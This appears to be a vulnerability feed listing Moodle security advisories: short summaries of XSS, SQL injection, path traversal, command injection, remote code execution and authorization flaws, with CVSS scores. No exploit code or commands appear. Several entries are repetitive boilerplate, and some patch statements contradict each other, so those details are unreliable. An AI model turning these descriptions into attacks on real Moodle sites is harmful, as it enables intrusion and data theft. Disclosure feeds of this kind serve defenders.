Moodle

Cross-course privilege escalation in Moodle Mod Customcert allows authenticated teachers with certificate management rights in any course to read and modify certificate data across the entire Moodle installation due to missing context validation in the editelement callback and save_element web service. An attacker with mod/customcert:manage permissions in a single course can exploit this to disclose sensitive certificate information from other courses or tamper with their certificate elements. Versions 4.4.9 and 5.0.3 patch the vulnerability, but no patch is currently available for affected versions.

Moodle's TeX formula editor fails to enforce adequate execution time limits when processing mimetex content, enabling authenticated users to craft malicious formulas that exhaust server resources. This resource exhaustion vulnerability can degrade application performance or trigger denial-of-service conditions without requiring user interaction or privilege escalation.

Moodle's TeX filter fails to properly sanitize administrative configuration inputs, enabling command injection on systems with ImageMagick installed. An authenticated administrator can inject arbitrary system commands through a malicious TeX filter setting, achieving code execution with the privileges of the Moodle server process. No patch is currently available, and exploitation requires administrative access but could compromise the entire Moodle installation.

Moodle's backup restore function fails to properly validate malicious backup files, allowing authenticated administrators to achieve remote code execution through crafted file processing. An attacker with restore privileges can exploit this code injection vulnerability to fully compromise the Moodle server. No patch is currently available.

A flaw was found in moodle. During anonymous assignment submissions, user identifiers were inadvertently exposed in URLs. [CVSS 4.3 MEDIUM]

A flaw was found in Moodle. An authorization logic flaw, specifically due to incomplete role checks during the badge awarding process, allowed badges to be granted without proper verification. [CVSS 5.4 MEDIUM]

A flaw was found in mooodle. A remote attacker could exploit a reflected Cross-Site Scripting (XSS) vulnerability in the policy tool return URL. [CVSS 5.4 MEDIUM]

A flaw was found in Moodle. A remote attacker could exploit a lack of proper rate limiting in the confirmation email service. [CVSS 7.5 HIGH]

A flaw was found in Moodle. An open redirect vulnerability in the OAuth login flow allows a remote attacker to redirect users to attacker-controlled pages after they have successfully authenticated. [CVSS 3.5 LOW]

A flaw was found in moodle. This formula injection vulnerability occurs when data fields are exported without proper escaping. [CVSS 6.1 MEDIUM]

A flaw was found in moodle. This vulnerability, known as Cross-Site Scripting (XSS), occurs due to insufficient checks on user-provided data in the formula editor's arithmetic expression fields. [CVSS 7.3 HIGH]

A flaw was found in Moodle. This cross-site scripting (XSS) vulnerability, caused by improper sanitization of AI prompt responses, allows attackers to inject malicious HTML or script into web pages. [CVSS 7.3 HIGH]

Moodle contains a vulnerability that allows attackers to authenticate through the Learning Tools Interoperability (LTI) Provider (CVSS 8.1).

A flaw was found in Moodle. An attacker with access to the restore interface could trigger server-side execution of arbitrary code. [CVSS 8.8 HIGH]

Moodle 3.10.3 contains a persistent cross-site scripting vulnerability in the calendar event subtitle field that allows attackers to inject malicious scripts. [CVSS 7.2 HIGH]

A session fixation vulnerability in Moodle 3.x through 3.11.18 allows unauthenticated attackers to hijack user sessions via the sesskey parameter. The sesskey can be obtained without authentication and reused within the OAuth2 login flow, resulting in the victim's session being linked to the attacker's. Successful exploitation results in full account takeover. According to the Moodle Releases page, "Bug fixes for security issues in 3.11.x ended 11 December 2023." NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

A reflected cross-site scripting (XSS) vulnerability exists in the Moodle LMS Jmol plugin version 6.1 and prior via the data parameter in jsmol.php. The application fails to properly sanitize user input before embedding it into the HTTP response, allowing an attacker to execute arbitrary JavaScript in the victim's browser by crafting a malicious link. This can be used to hijack user sessions or manipulate page content. Exploitation evidence was observed by the Shadowserver Foundation on 2025-02-02 UTC.

The Moodle LMS Jmol plugin version 6.1 and earlier contains a path traversal vulnerability in jsmol.php. The query parameter is passed directly to file_get_contents() without validation, allowing unauthenticated attackers to read arbitrary files from the Moodle server including configuration files with database credentials.

A vulnerability classified as problematic was found in Catalyst User Key Authentication Plugin 20220819 on Moodle. Rated medium severity (CVSS 5.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

A flaw was discovered in Moodle. Rated medium severity (CVSS 4.3), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

A flaw was found in Moodle. Rated medium severity (CVSS 4.3), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

A flaw was found in Moodle. Rated medium severity (CVSS 4.3), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

A flaw was found in Moodle. Rated medium severity (CVSS 5.4), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

A flaw was found in Moodle. Rated high severity (CVSS 8.8), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

A flaw was found in Moodle. Rated high severity (CVSS 8.8), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

A flaw was found in Moodle. Rated medium severity (CVSS 4.3), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

A flaw was found in Moodle. Rated high severity (CVSS 8.8), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

A security vulnerability was found in Moodle where confidential information that prevents cross-site request forgery (CSRF) attacks was shared publicly through the site's URL. Rated low severity (CVSS 3.1), this vulnerability is remotely exploitable.

A flaw was found in Moodle. Rated medium severity (CVSS 4.3), this vulnerability is remotely exploitable, low attack complexity.

A security vulnerability was discovered in Moodle that allows anyone to duplicate existing tours without needing to log in due to a lack of protection against cross-site request forgery (CSRF). Rated low severity (CVSS 3.5), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

A flaw has was found in Moodle where anonymous assignment submissions can be de-anonymized via search, revealing student identities. Rated medium severity (CVSS 4.3), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

A security vulnerability was discovered in Moodle that allows some users to access sensitive information about other students before they finish verifying their identities using two-factor. Rated medium severity (CVSS 4.3), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

A security vulnerability was discovered in Moodle that can allow hackers to gain access to sensitive information about students and prevent them from logging into their accounts, even after they had. Rated high severity (CVSS 7.1), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

A flaw has been identified in Moodle where insufficient capability checks in certain grade reports allowed users without the necessary permissions to access hidden grades. Rated medium severity (CVSS 5.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

A flaw has been identified in Moodle where, on certain sites, unauthenticated users could retrieve sensitive user data-including names, contact information, and hashed passwords-via stack traces. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

A security vulnerability was discovered in Moodle that allows students to enroll themselves in courses without completing all the necessary safety checks. Rated medium severity (CVSS 4.3), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

An SQL injection risk was identified in the module list filter within course search. Rated high severity (CVSS 8.1), this vulnerability is remotely exploitable, no authentication required.

Additional checks were required to ensure trusttext is applied (when enabled) to glossary entries being restored. Rated low severity (CVSS 3.1), this vulnerability is remotely exploitable. This Incorrect Authorization vulnerability could allow attackers to bypass authorization checks to access restricted resources.

Insufficient capability checks made it possible to disable badges a user does not have permission to access. Rated low severity (CVSS 3.1), this vulnerability is remotely exploitable, no authentication required. This Incorrect Authorization vulnerability could allow attackers to bypass authorization checks to access restricted resources.

The question bank filter required additional sanitizing to prevent a reflected XSS risk. Rated high severity (CVSS 8.3), this vulnerability is remotely exploitable, no authentication required. This Cross-Site Scripting (XSS) vulnerability could allow attackers to inject malicious scripts into web pages viewed by other users.

Description information displayed in the site administration live log required additional sanitizing to prevent a stored XSS risk. Rated high severity (CVSS 8.3), this vulnerability is remotely exploitable, no authentication required. This Cross-Site Scripting (XSS) vulnerability could allow attackers to inject malicious scripts into web pages viewed by other users.

The drag-and-drop onto image (ddimageortext) question type required additional sanitizing to prevent a stored XSS risk. Rated low severity (CVSS 3.4), this vulnerability is remotely exploitable, no authentication required. This Cross-Site Scripting (XSS) vulnerability could allow attackers to inject malicious scripts into web pages viewed by other users.

Tags not expected to be visible to a user could still be discovered by them via the tag search page or in the tags block. Rated medium severity (CVSS 5.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity.

Separate Groups mode restrictions were not factored into permission checks before allowing viewing or deletion of responses in Feedback activities. Rated medium severity (CVSS 6.5), this vulnerability is remotely exploitable, no authentication required, low attack complexity. This Incorrect Authorization vulnerability could allow attackers to bypass authorization checks to access restricted resources.

Insufficient sanitizing in the TeX notation filter resulted in an arbitrary file read risk on sites where pdfTeX is available (such as those with TeX Live installed). Rated high severity (CVSS 8.6), this vulnerability is remotely exploitable, no authentication required, low attack complexity.